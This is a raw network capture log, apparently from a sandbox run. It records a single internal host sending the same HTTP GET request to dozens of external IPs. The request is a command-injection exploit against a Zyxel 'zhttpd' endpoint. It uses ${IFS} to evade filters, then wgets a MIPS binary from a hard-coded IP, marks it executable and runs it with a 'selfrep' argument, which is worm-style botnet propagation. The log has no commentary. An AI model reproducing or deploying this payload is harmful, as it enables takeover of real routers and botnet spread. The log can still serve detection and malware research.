                                        Jan 14, 2024 16:18:58.780714989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8164192.168.2.133797498.219.83.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.780816078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8165192.168.2.134159464.85.64.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.780844927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8166192.168.2.1346792182.6.124.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.780932903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8167192.168.2.1349600157.18.12.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781013012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8168192.168.2.135408223.170.204.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781064987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8169192.168.2.1356672163.33.114.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781116009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8170192.168.2.1340172101.157.72.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781198978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8171192.168.2.1348752212.192.32.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781218052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8172192.168.2.1354822192.6.187.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781279087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8173192.168.2.1346006104.96.40.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781332016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8174192.168.2.1351348208.38.125.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781392097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8175192.168.2.134305040.28.33.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781438112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8176192.168.2.1336492148.178.37.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781512022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8177192.168.2.135531261.27.34.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781570911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8178192.168.2.1359808154.174.134.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781603098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8179192.168.2.1349286213.65.76.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781675100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8180192.168.2.1349642148.179.224.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781714916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8181192.168.2.1359752148.32.37.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781789064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8182192.168.2.1354448102.71.184.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781855106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8183192.168.2.133283641.213.163.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781891108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8184192.168.2.1356024104.93.228.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.781950951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8185192.168.2.1351076103.77.53.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782027006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8186192.168.2.135167295.53.57.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782083988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8187192.168.2.13472809.160.189.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782125950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8188192.168.2.134784047.9.119.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782206059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8189192.168.2.134676443.107.147.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782260895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8190192.168.2.135515235.23.73.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782313108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8191192.168.2.1337156140.179.71.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782351971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8192192.168.2.135714843.251.151.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782428980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8193192.168.2.1358794171.193.129.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782483101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8194192.168.2.1360978162.79.26.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782517910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8195192.168.2.1337048138.69.186.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782574892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8196192.168.2.134005263.120.79.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782624960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8197192.168.2.1349130218.124.33.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782687902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8198192.168.2.134973648.241.213.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782742977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8199192.168.2.134701493.57.164.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782818079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8200192.168.2.1347950167.18.106.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782886028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8201192.168.2.1351252216.155.179.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782907963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8202192.168.2.133667680.27.250.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.782987118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8203192.168.2.135542053.186.211.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783040047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8204192.168.2.133798895.122.3.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783086061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8205192.168.2.135409252.6.172.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783164024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8206192.168.2.133509841.197.49.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783209085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8207192.168.2.1350134149.238.60.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783263922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8208192.168.2.1340110198.215.34.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783329964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8209192.168.2.1345130142.231.50.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783392906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8210192.168.2.134972432.156.210.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783454895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8211192.168.2.1360612149.14.245.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783531904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8212192.168.2.1345628209.84.90.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783592939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8213192.168.2.133598237.127.180.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783638954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8214192.168.2.1358782129.166.214.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783693075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8215192.168.2.1358998208.52.222.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783747911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8216192.168.2.1358548122.4.76.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783787966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8217192.168.2.1358600176.74.25.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783859968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8218192.168.2.1337120136.171.102.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783929110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8219192.168.2.1350128218.94.165.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.783963919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8220192.168.2.133430039.234.11.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784070015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8221192.168.2.133727869.251.232.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784105062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8222192.168.2.135988650.16.122.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784123898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8223192.168.2.133820453.3.37.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784169912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8224192.168.2.1344256167.102.186.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784224987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8225192.168.2.1354104109.2.40.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784302950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8226192.168.2.1333542203.19.205.3443
                                        TimestampBytes transferredDirectionData
